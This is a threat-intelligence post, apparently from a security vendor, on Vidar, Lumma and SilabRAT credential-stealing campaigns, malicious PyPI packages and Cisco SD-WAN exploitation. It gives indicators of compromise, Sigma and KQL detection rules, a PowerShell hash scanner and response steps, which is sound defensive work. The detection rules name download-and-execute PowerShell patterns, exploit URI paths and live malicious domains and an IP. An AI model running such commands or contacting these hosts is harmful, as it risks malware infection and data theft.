Vidar, Lumma, and SilabRAT: Multi-Vector Credential Theft Campaigns via AI Lures & Supply Chains

Recent OTX pulses reveal a coordinated surge in credential theft operations utilizing diverse initial access vectors. Threat actors are aggressively exploiting the "AI hype cycle" (Storm-3075) and social media trends (TikTok tutorials) to distribute information stealers like Vidar and Lumma. Simultaneously, the Malware-as-a-Service (MaaS) ecosystem is evolving with the emergence of SilabRAT by actor o1oo1, which specializes in browser profile cloning and HVNC to bypass session protections.

Beyond social engineering, sophisticated supply chain attacks are targeting bioinformatics and MCP developers via malicious PyPI packages (Mini Shai-Hulud, Miasma). Infrastructure-focused actors (UAT-8616) are also actively exploiting Cisco Catalyst SD-WAN vulnerabilities to establish persistence via webshells. Collectively, these campaigns represent a full-spectrum assault on identity and session integrity, aiming to harvest credentials for financial fraud and unauthorized access.

Threat Actor / Malware Profile

Actors: Storm-3075, o1oo1, UAT-8616

Malware Families:

Vidar Stealer: A modular infostealer often distributed via malvertising and social media. It harvests browser cookies, history, saved passwords, and cryptocurrency wallet data. Frequently uses Hijack Loader for execution.
Lumma Stealer: A subscription-based infostealer (C2) known for aggressive evasion and targeting sensitive data (browser data, 2FA sessions). Observed in campaigns impersonating AI brands.
SilabRAT: A MaaS offering ($5,000/mo) featuring Hidden Virtual Network Computing (HVNC) for undetectable remote control, and browser profile cloning to impersonate valid user sessions without triggering MFA.
Supply Chain Loaders (Miasma/Hades): Malicious Python packages (.whl) using .pth hooks or .abi3.so extensions to execute shellcode upon import, targeting developer environments.

Attack Chain:

Initial Access: SEO poisoning (AI lures), Social Media (TikTok tutorials), Supply Chain (PyPI), or Exploit (Cisco SD-WAN).
Execution: PowerShell scripts (Vidar), Python import hooks (Miasma), or Webshell upload (UAT-8616).
Persistence: Scheduled tasks, Registry run keys, or legitimate service hijacking.
Objective: Credential dumping, session token theft, and cryptocurrency wallet extraction.

IOC Analysis

The provided pulses contain actionable indicators spanning the infrastructure and payload layers:

Domains (C2/Download): brokeapt.com, msget.run, d4ug.site, pan.rongtv.xyz. SOC teams should block these at the DNS/Proxy layer immediately. The .run and .xyz TLDs are frequently abused in these campaigns.
IPv4: 91.199.163.124 (SilabRAT infrastructure).
File Hashes (SHA256): Multiple payloads for Vidar, Lumma, and SilabRAT. EDR solutions should be configured to alert on execution matches.
CVEs: CVE-2026-20128 and CVE-2026-20133 (Cisco SD-WAN). Vulnerability scanners must check for these specific CVEs.

Operational Guidance:

Decoding: The domains msget.run and d4ug.site mimic legitimate software update repositories but host malware.
Tooling: Use curl or nslookup to check connectivity to these domains from isolated sandboxes. Validate file hashes using VT or AlienVault OTX lookup.

Detection Engineering

YAML

---
title: Potential Vidar/Lumma Stealer via PowerShell Social Media Lure
id: 8e2f4a91-1b2c-3d4e-5f6a-7b8c9d0e1f2a
description: Detects PowerShell commands downloading payloads from suspicious TLDs often used in TikTok or AI-themed malvertising campaigns for Vidar/Lumma stealers.
status: experimental
date: 2026/06/13
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/ai-brands-as-bait/
    - https://otx.alienvault.com/pulse/fake-software-tutorials-tiktok/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4688
        NewProcessName|endswith: \powershell.exe
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'IEX'
            - 'DownloadString'
    selection_url:
        CommandLine|contains:
            - '.run'
            - '.xyz'
            - 'msget.run'
            - 'd4ug.site'
    condition: selection and selection_url
falsepositives:
    - Legitimate administration scripts downloading from rare TLDs
level: high
---
title: Malicious PyPI Wheel Execution via .pth Hooks
id: 3c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f
description: Detects the creation of .pth files in Python site-packages, a technique used by Miasma and Hades worms to achieve persistence via import hooks.
status: experimental
date: 2026/06/13
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/mini-shai-hulud-miasma/
tags:
    - attack.persistence
    - attack.t1547.001
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID: 11
        TargetFilename|contains: '\Lib\site-packages\'
        TargetFilename|endswith: '.pth'
    condition: selection
falsepositives:
    - Legitimate Python package installations (verify package reputation)
level: medium
---
title: Cisco SD-WAN Manager Authentication Bypass Exploit Attempt
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects exploitation attempts against Cisco Catalyst SD-WAN Manager utilizing authentication bypass vulnerabilities.
status: experimental
date: 2026/06/13
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/cisco-sd-wan-exploitation/
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    product: cisco
    service: sd-wan
detection:
    selection_uri:
        c-uri|contains:
            - '/appmgr/maintenance/'
            - '/das/query'
    selection_method:
        c-method: 'POST'
    selection_status:
        sc-status: 200
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical


kql
// Hunt for Vidar/Lumma C2 Domains and IP connections
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("brokeapt.com", "msget.run", "d4ug.site", "pan.rongtv.xyz") 
   or RemoteIP == "91.199.163.124"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend ThreatContext = "OTX Pulse: AI Lures / TikTok / SilabRAT"

// Hunt for file hashes associated with identified malware families
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA256 in (
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b"
)
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, SHA256


powershell
# IOC Hunter: Scans for Vidar/Lumma/Payload Artifacts on Disk
# Requires Administrator Privileges

$TargetHashes = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b"
)

Write-Host "[+] Starting IOC Scan for Vidar/Lumma/SilabRAT Artifacts..." -ForegroundColor Cyan

# Scan C: drive
$DrivesToScan = @("C:\")

foreach ($Drive in $DrivesToScan) {
    Write-Host "[+] Scanning $Drive..." -ForegroundColor Yellow
    
    Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { 
        $_.Length -gt 0kb -and 
        $_.Extension -match "(exe|dll|ps1|zip|rat)" -and
        ($TargetHashes -contains (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash)
    } | 
    Select-Object FullName, @{Name="SHA256";Expression={(Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash}}, LastWriteTime | 
    Export-Csv -Path "C:\Temp\IOC_Match.csv" -NoTypeInformation -Append
}

if (Test-Path "C:\Temp\IOC_Match.csv") {
    Write-Host "[!] Scan Complete. Matches found at C:\Temp\IOC_Match.csv" -ForegroundColor Red
} else {
    Write-Host "[+] Scan Complete. No matching files found." -ForegroundColor Green
}

Response Priorities

Immediate (0-24h):

Network Blocking: Block all domains listed in IOC Analysis (*.run, *.xyz) and IP 91.199.163.124 on firewalls and proxies.
Vulnerability Patching: Identify and patch Cisco Catalyst SD-WAN instances vulnerable to CVE-2026-20128 immediately.
Endpoint Isolation: Isolate endpoints triggering Sigma rules for PowerShell downloads from suspicious TLDs.

24-48h:

Credential Hygiene: Force password resets and session invalidation for users in targeted segments (Tech, Finance, Bioinformatics) if credential theft is suspected.
Supply Chain Audit: Developers must verify Python package integrity (pip-audit) and remove packages matching "Mini Shai-Hulud" or "Miasma" descriptions.

1 Week+:

Architecture Hardening: Implement strict application allowlisting to prevent execution of unauthorized PowerShell scripts and binaries.
User Awareness: Update security awareness training to include warnings regarding "AI software" scams and TikTok/Instagram "software hack" tutorials.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub